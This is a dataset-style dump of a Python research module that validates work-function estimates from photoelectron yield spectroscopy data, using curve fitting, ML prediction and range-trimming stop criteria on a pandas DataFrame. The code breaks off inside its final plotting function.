hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2a7384f2e4aad416a1b75b8c3ee8d3b58c1145b3
| 51,425
|
py
|
Python
|
pysfunclib/validation_func.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
pysfunclib/validation_func.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
pysfunclib/validation_func.py
|
s-yagyu/pys
|
3ded91377bf2c863db40525e34bfbe41db1d7c37
|
[
"MIT"
] | null | null | null |
import os
import time
from datetime import datetime
import pandas as pd
from pandas import Series, DataFrame
import scipy as sp
from scipy.optimize import leastsq
from scipy import stats
import numpy as np
import matplotlib.pyplot as plt
from pysfunclib import fowler_func as ff
from pysfunclib import fowler_func_opti as ffo
from pysfunclib import fit_prediction_lib as fpl
from pysfunclib import ml_prediction_lib as mp
from pysfunclib import rest_fit_prediction_lib as rfpl
"""
検証用のデータ解析用コード
Excelでまとめた検証データの解析用モジュール
"""
class DfFrame():
    """Analysis helper wrapping a validation DataFrame.

    The wrapped frame is expected to carry the measured spectra
    ('ene', 'n_pys') and the labelled work function ('estimate_wf');
    the methods of this class add prediction-result columns to it.
    """

    # Columns created by df_column_set(), in insertion order.
    _RESULT_COLUMNS = (
        "diff_fit", "diff_gb", "diff_rf", "diff_fit_abs",
        "predict_fit", "predict_gb", "predict_rf", "predict_fit_abs",
        "del_abs_fit", "del_lsq_fit", "del_abs_diff", "del_lsq_diff",
        "remove",
    )

    def __init__(self, df):
        # Keep a reference (not a copy): callers observe updates in place.
        self.df = df

    def df_column_set(self):
        """Create every result column, filled with a 0.01 placeholder."""
        for column in self._RESULT_COLUMNS:
            self.df[column] = 0.01

    def df_return(self):
        """Return the wrapped (possibly updated) DataFrame."""
        return self.df
def df_ml(self, path_name):
"""
path_name: regration parameter path
ex: './spys_reg_20200228_pure/'
"""
prd=mp.MLPredict(path_name=path_name)
prd.param_load()
start_time = time.time()
print("Start time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata_ =np.array(eval(self.df["ene"][i]))
ydata_ = np.array(eval(self.df["n_pys"][i]))
ml_values= prd.prediction(xdata_,ydata_)
self.df["predict_gb"][i]=ml_values['gb']
self.df["diff_gb"][i]=self.df["predict_gb"][i]-self.df['estimate_wf'][i]
self.df["predict_rf"][i]=ml_values['rf']
self.df["diff_rf"][i]=self.df["predict_rf"][i]-self.df['estimate_wf'][i]
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('sample nmae:',self.df["Sample_name"][i])
print('renge:',self.df["energy_range"][i])
print('wf:',self.df["estimate_wf"][i])
print('predict_GB:',self.df["predict_gb"][i])
print('difference_GB:',self.df["diff_gb"][i])
print('predict_RF:',self.df["predict_rf"][i])
print('difference_RF:',self.df["diff_rf"][i])
print()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_fitting(self, lossfunc='rmse'):
"""
all range fitting
lossfunc =
'mae' : absolute loss function
'rmse':least squrt loss function
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
#1行の行列に変換
xdata_ =np.array(eval(self.df["ene"][i]))
ydata_ = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
if lossfunc == 'mae':
fit_spys, fit_para, r2, ratio = ffo.abs_spys_fit(xdata_,ydata_,ini_para)
elif lossfunc == 'rmse' :
fit_spys, fit_para, r2, ratio = ffo.lsq_spys_fit(xdata_,ydata_,ini_para)
else :
pass
self.df.loc[i,["predict_fit"]] = fit_para[0]
self.df.loc[i,["diff_fit"]]=self.df["predict_fit"][i]-self.df['estimate_wf'][i]
r2_=r2
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('sample name:',self.df["Sample_name"][i])
print('renge:',self.df["energy_range"][i])
print('wf:',self.df["estimate_wf"][i])
print('predict_fit:',self.df["predict_fit"][i],type(self.df["predict_fit"][i]))
print('difference_fit:',self.df["diff_fit"][i])
print('r2:',r2_)
print()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_fitting2(self):
"""
all range fitting
lossfunc =
'mae' : absolute loss function
'rmse':least squrt loss function
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
#1行の行列に変換
xdata_ =np.array(eval(self.df["ene"][i]))
ydata_ = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
fit_spys_abs, fit_para_abs, r2_abs, ratio_abs = ffo.abs_spys_fit(xdata_,ydata_,ini_para)
fit_spys_lsq, fit_para_lsq, r2_lsq, ratio_lsq = ffo.lsq_spys_fit(xdata_,ydata_,ini_para)
# fitplot=fpl.FittingComparePlot(xdata=xdata_, ydata=ydata_,
# lsq_fit=fit_spys_lsq,
# lsq_para=fit_para_lsq,
# abs_fit=fit_spys_abs,
# abs_para=fit_para_abs,
# label=ini_para[0])
# fitplot.fit_plot()
if fit_para_lsq[0] > 7.0:
self.df.loc[i,["predict_fit"]] = 7.0
elif fit_para_lsq[0] <= 7.0:
self.df.loc[i,["predict_fit"]] = fit_para_lsq[0]
self.df.loc[i,["diff_fit"]]=self.df["predict_fit"][i]-self.df['estimate_wf'][i]
if fit_para_abs[0] > 7.0:
self.df.loc[i,["predict_fit_abs"]] = 7.0
elif fit_para_abs[0] <= 7.0:
self.df.loc[i,["predict_fit_abs"]] = fit_para_abs[0]
self.df.loc[i,["diff_fit_abs"]]=self.df["predict_fit_abs"][i]-self.df['estimate_wf'][i]
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('sample name:',self.df["Sample_name"][i])
print('renge:',self.df["energy_range"][i])
print('wf:',self.df["estimate_wf"][i])
print('lsq')
print('predict_fit:',self.df["predict_fit"][i],type(self.df["predict_fit"][i]))
print('difference_fit:',self.df["diff_fit"][i])
print('r2:',r2_lsq)
print('abs')
print('predict_fit:',self.df["predict_fit_abs"][i],type(self.df["predict_fit_abs"][i]))
print('difference_fit:',self.df["diff_fit_abs"][i])
print('r2:',r2_abs)
print()
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
    def df_plot_raw(self):
        """Plot each row's raw spectrum (no fit curve is drawn).

        Note: both the MAE ('abs') and RMSE ('lsq') fits are still
        computed so that the capped results can be stored in
        'predict_fit' / 'predict_fit_abs'; only the plot itself shows
        raw data (fitplot.raw_plot()).
        """
        start_time = time.time()
        print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
        for i in self.df.index:
            # Convert the stored list strings into 1-D arrays.
            xdata_ =np.array(eval(self.df["ene"][i]))
            ydata_ = np.array(eval(self.df["n_pys"][i]))
            ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
            fit_spys_abs, fit_para_abs, r2_abs, ratio_abs = ffo.abs_spys_fit(xdata_,ydata_,ini_para)
            fit_spys_lsq, fit_para_lsq, r2_lsq, ratio_lsq = ffo.lsq_spys_fit(xdata_,ydata_,ini_para)
            fitplot=fpl.FittingComparePlot(xdata=xdata_, ydata=ydata_,
                                           lsq_fit=fit_spys_lsq,
                                           lsq_para=fit_para_lsq,
                                           abs_fit=fit_spys_abs,
                                           abs_para=fit_para_abs,
                                           label=ini_para[0])
            # Raw data only — no regression curve on this plot.
            fitplot.raw_plot()
            # Cap the lsq-fitted work function at 7.0 eV before storing.
            if fit_para_lsq[0] > 7.0:
                self.df.loc[i,["predict_fit"]] = 7.0
            elif fit_para_lsq[0] <= 7.0:
                self.df.loc[i,["predict_fit"]] = fit_para_lsq[0]
            self.df.loc[i,["diff_fit"]]=self.df["predict_fit"][i]-self.df['estimate_wf'][i]
            # Same cap for the abs (MAE) fit.
            if fit_para_abs[0] > 7.0:
                self.df.loc[i,["predict_fit_abs"]] = 7.0
            elif fit_para_abs[0] <= 7.0:
                self.df.loc[i,["predict_fit_abs"]] = fit_para_abs[0]
            self.df.loc[i,["diff_fit_abs"]]=self.df["predict_fit_abs"][i]-self.df['estimate_wf'][i]
            print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
            print('sample name:',self.df["Sample_name"][i])
            print('renge:',self.df["energy_range"][i])
            print('wf:',self.df["estimate_wf"][i])
            print('lsq')
            print('predict_fit:',self.df["predict_fit"][i],type(self.df["predict_fit"][i]))
            print('difference_fit:',self.df["diff_fit"][i])
            print('r2:',r2_lsq)
            print('abs')
            print('predict_fit:',self.df["predict_fit_abs"][i],type(self.df["predict_fit_abs"][i]))
            print('difference_fit:',self.df["diff_fit_abs"][i])
            print('r2:',r2_abs)
            print()
        elapsed_time = time.time() - start_time
        print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
        print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_del_fitting_plot_rre(self):
"""
Loss function:mae mimimaize -> mae
Loss function:rmse mimimaize -> rmse
relative_ratio: rr= rmse/mae
Stop condition: rr < 1.41
Note: Not Good argolithm
問題点:最小化した回帰線それぞれからmae,rmseを導出してその比を取っている
(特許で一番最初のもの)
データ点が少なくモデルの誤差が多いときrrは不安定になる
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata = np.array(eval(self.df["ene"][i]))
ydata = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
self.start_remove = 0
self.iteration_step = 1
# Fitting
remove = self.start_remove
while True:
if remove == 0:
self.xdata_ = xdata[:]
self.ydata_ = ydata[:]
#All range fit_lsq
_, fit_para, _, _ = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
self.df.loc[i,["predict_fit"]] = fit_para[0]
else:
self.xdata_ = xdata[:(-1 * remove)]
self.ydata_ = ydata[:(-1 * remove)]
self.abs_fit_spys, self.abs_fit_para, abs_r2, abs_ratio = ffo.abs_spys_fit(self.xdata_, self.ydata_, ini_para)
self.lsq_fit_spys, self.lsq_fit_para, lsq_r2, lsq_ratio = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
print('---info------')
print('Sample name:',self.df["Sample_name"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('Remove point:', remove)
print('spys_lsq[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.lsq_fit_spys))
print('lsq_fit para', self.lsq_fit_para)
print()
print('spys_abs[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.abs_fit_spys))
print('abs_fit para', self.abs_fit_para)
print()
_,lsq_rmse,_,_ = ffo.evaluation(self.ydata_, self.lsq_fit_spys)
_,_,abs_mae,_ = ffo.evaluation(self.ydata_, self.abs_fit_spys)
relative_ratio=lsq_rmse/abs_mae
ratio2 = lsq_ratio/abs_ratio
print('lsq_rmse/abs_mae:{}'.format(relative_ratio))
print()
print('-----------------')
fitplot = fp.FittingComparePlot(self.xdata_, self.ydata_, self.lsq_fit_spys, self.lsq_fit_para, self.abs_fit_spys, self.abs_fit_para)
fitplot.fit_res_plot()
# 1.42
# if abs_ratio < 1.42 and lsq_ratio < 1.26 and relative_ratio < 1.26: and (abs_ratio < 1.5 or lsq_ratio<1.3)
# if 0.83 < ratio2 < 1.0 :
# if 0.886 < ratio2 < 1.128 :
# if 1.24 < relative_ratio < 1.42 :
if relative_ratio < 1.42 :
break
else:
remove = remove + self.iteration_step
self.df.loc[i,["del_abs_fit"]]=self.abs_fit_para[0]
self.df.loc[i,["del_lsq_fit"]]=self.lsq_fit_para[0]
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
print('############### Final results ############################')
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('Sample name:',self.df["Sample_name"][i])
print('Energy renge:',self.df["energy_range"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('---')
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print("remove:",remove)
print('lsq_rmse/abs_mae:{}'.format(relative_ratio))
print('---')
print()
print('R2_lsq:',lsq_r2)
print('lsq_ratio',lsq_ratio)
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print()
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print('#########################################################')
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_del_fitting_plot_re(self):
"""
Simple model
Loss function : MAE
Stop condition: Re=RMSE/MAE<1.41
Note:
分析範囲の削減が止まらない可能性がある。
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata = np.array(eval(self.df["ene"][i]))
ydata = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
self.start_remove = 0
self.iteration_step = 1
# Fitting
remove = self.start_remove
r2_val = 0
abs_fit_para_val = 0
lsq_fit_para_val = 0
while True:
if remove == 0:
self.xdata_ = xdata[:]
self.ydata_ = ydata[:]
#All range fit_lsq
_, fit_para, _, _ = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
self.df.loc[i,["predict_fit"]]= fit_para[0]
else:
self.xdata_ = xdata[:(-1 * remove)]
self.ydata_ = ydata[:(-1 * remove)]
self.abs_fit_spys, self.abs_fit_para, abs_r2, abs_ratio = ffo.abs_spys_fit(self.xdata_, self.ydata_, ini_para)
self.lsq_fit_spys, self.lsq_fit_para, lsq_r2, lsq_ratio = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
print('---info------')
print('sample name:',self.df["Sample_name"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('Remove point:', remove)
print('spys_lsq[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.lsq_fit_spys))
print('lsq_fit para', self.lsq_fit_para)
print()
print('spys_abs[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.abs_fit_spys))
print('abs_fit para', self.abs_fit_para)
print()
print('-----------------')
ratio = abs_ratio
fitplot = fp.FittingComparePlot(self.xdata_, self.ydata_, self.lsq_fit_spys, self.lsq_fit_para, self.abs_fit_spys, self.abs_fit_para)
fitplot.fit_res_plot()
if abs_r2 < 0:
print('R2 is negaive')
print('remove point: ',remove)
self.df.loc[i,["del_abs_fit"]]=7.0
self.df.loc[i,["del_lsq_fit"]]=7.0
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
break
elif ratio < 1.414:
print('stop! under 1.41')
print('remove point: ',remove)
self.df.loc[i,["del_abs_fit"]]=self.abs_fit_para[0]
self.df.loc[i,["del_lsq_fit"]]=self.lsq_fit_para[0]
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
break
else:
pass
remove = remove + self.iteration_step
print('############### Final results ############################')
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('Sample name:',self.df["Sample_name"][i])
print('Energy renge:',self.df["energy_range"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('---')
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print("remove:",remove)
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('---')
print()
print('R2_lsq:',lsq_r2)
print('lsq_ratio',lsq_ratio)
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print()
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print('#########################################################')
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_del_fitting_plot_rer2(self):
"""
Loss function : MAE
Stop condition: Re=RMSE/MAE<1.41 and R2(abs) improvement
Note:
比とR2の比較で削減範囲を止める
最新のアルゴリズム
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata = np.array(eval(self.df["ene"][i]))
ydata = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
self.start_remove = 0
self.iteration_step = 1
# Fitting
remove = self.start_remove
r2_val = 0
abs_fit_para_val = 0
lsq_fit_para_val = 0
while True:
if remove == 0:
self.xdata_ = xdata[:]
self.ydata_ = ydata[:]
#All range fit_lsq
_, fit_para, _, _ = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
self.df.loc[i,["predict_fit"]]= fit_para[0]
else:
self.xdata_ = xdata[:(-1 * remove)]
self.ydata_ = ydata[:(-1 * remove)]
self.abs_fit_spys, self.abs_fit_para, abs_r2, abs_ratio = ffo.abs_spys_fit(self.xdata_, self.ydata_, ini_para)
self.lsq_fit_spys, self.lsq_fit_para, lsq_r2, lsq_ratio = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
print('---info------')
print('sample name:',self.df["Sample_name"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('Remove point:', remove)
print('spys_lsq[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.lsq_fit_spys))
print('lsq_fit para', self.lsq_fit_para)
print()
print('spys_abs[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.abs_fit_spys))
print('abs_fit para', self.abs_fit_para)
print()
print('-----------------')
ratio = abs_ratio
fitplot = fp.FittingComparePlot(self.xdata_, self.ydata_, self.lsq_fit_spys, self.lsq_fit_para, self.abs_fit_spys, self.abs_fit_para)
fitplot.fit_res_plot()
if abs_r2 < 0:
print('R2 is negaive')
print('remove point: ',remove)
self.df.loc[i,["del_abs_fit"]]=7.0
self.df.loc[i,["del_lsq_fit"]]=7.0
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
break
elif ratio < 1.414:
print('stop! under 1.41')
print('remove point: ',remove)
self.df.loc[i,["del_abs_fit"]]=self.abs_fit_para[0]
self.df.loc[i,["del_lsq_fit"]]=self.lsq_fit_para[0]
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove
break
elif r2_val > abs_r2 and ratio > 1.414 :
print('stop! over 1.41 and good R2 ')
print('remove point: ',remove-1)
self.df.loc[i,["del_abs_fit"]]=abs_fit_para_val
self.df.loc[i,["del_lsq_fit"]]=lsq_fit_para_val
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove-1
break
else:
pass
remove = remove + self.iteration_step
r2_val = abs_r2
abs_fit_para_val = self.abs_fit_para[0]
lsq_fit_para_val = self.lsq_fit_para[0]
print('############### Final results ############################')
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('Sample name:',self.df["Sample_name"][i])
print('Energy renge:',self.df["energy_range"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('---')
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print("remove:",remove)
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('---')
print()
print('R2_lsq:',lsq_r2)
print('lsq_ratio',lsq_ratio)
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print()
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print('#########################################################')
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def df_del_fitting_plot_r2(self):
"""
Loss function MAE
Stop condtion: R2 improvement
Note:
R2の値だけでR2の値が前の値よりも悪くなった時点でストップする。
"""
start_time = time.time()
print("Start time: ", datetime.now().strftime('%Y%m%d %H:%M:%S') )
for i in self.df.index:
xdata = np.array(eval(self.df["ene"][i]))
ydata = np.array(eval(self.df["n_pys"][i]))
ini_para = np.array([self.df["estimate_wf"][i],300,1,10])
self.start_remove = 0
self.iteration_step = 1
# Fitting
remove = self.start_remove
r2_val = 0
abs_fit_para_val = 0
lsq_fit_para_val = 0
while True:
if remove == 0:
self.xdata_ = xdata[:]
self.ydata_ = ydata[:]
#All range fit_lsq
_, fit_para, _, _ = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
self.df.loc[i,["predict_fit"]]= fit_para[0]
else:
self.xdata_ = xdata[:(-1 * remove)]
self.ydata_ = ydata[:(-1 * remove)]
self.abs_fit_spys, self.abs_fit_para, abs_r2, abs_ratio = ffo.abs_spys_fit(self.xdata_, self.ydata_, ini_para)
self.lsq_fit_spys, self.lsq_fit_para, lsq_r2, lsq_ratio = ffo.lsq_spys_fit(self.xdata_, self.ydata_, ini_para)
print('---info------')
print('sample name:',self.df["Sample_name"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('Remove point:', remove)
print('spys_lsq[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.lsq_fit_spys))
print('lsq_fit para', self.lsq_fit_para)
print()
print('spys_abs[r2,rmse,mae,ratio]:', ffo.evaluation(self.ydata_, self.abs_fit_spys))
print('abs_fit para', self.abs_fit_para)
print()
print('-----------------')
fitplot = fp.FittingComparePlot(self.xdata_, self.ydata_, self.lsq_fit_spys, self.lsq_fit_para, self.abs_fit_spys, self.abs_fit_para)
fitplot.fit_res_plot()
if r2_val > abs_r2 :
print('stop! good R2 ')
print('remove point: ',remove-1)
self.df.loc[i,["del_abs_fit"]]=abs_fit_para_val
self.df.loc[i,["del_lsq_fit"]]=lsq_fit_para_val
self.df.loc[i,["del_abs_diff"]]=self.df["del_abs_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["del_lsq_diff"]]=self.df["del_lsq_fit"][i]-self.df['estimate_wf'][i]
self.df.loc[i,["remove"]] = remove-1
break
remove = remove + self.iteration_step
r2_val = abs_r2
abs_fit_para_val = self.abs_fit_para[0]
lsq_fit_para_val = self.lsq_fit_para[0]
print('############### Final results ############################')
print("Time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
print('Sample name:',self.df["Sample_name"][i])
print('Energy renge:',self.df["energy_range"][i])
print('Label WF:',self.df["estimate_wf"][i])
print('---')
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print("remove:",remove-1)
print('R2_abs:',r2_val)
print('abs_ratio',abs_ratio)
print('---')
print()
print('R2_lsq:',lsq_r2)
print('lsq_ratio',lsq_ratio)
print('Ip(lsq):', self.df["del_lsq_fit"][i])
print()
print('R2_abs:',abs_r2)
print('abs_ratio',abs_ratio)
print('Ip(abs):', self.df["del_abs_fit"][i])
print()
print('#########################################################')
elapsed_time = time.time() - start_time
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
print("Finished time: ",datetime.now().strftime('%Y%m%d %H:%M:%S') )
def select_plot(df_name, comment='', gb=True, rf=True, fit=True, dabsfit=True, dlsqfit=True):
    """Plot each row's spectrum with annotated work-function estimates.

    Parameters
    ----------
    df_name : DataFrame
        Selected rows to plot.
    comment : str
        Free text echoed to stdout.
    gb, rf, fit, dabsfit, dlsqfit : bool
        Toggle the corresponding annotation arrows.
    """
    # Default font size is 12.
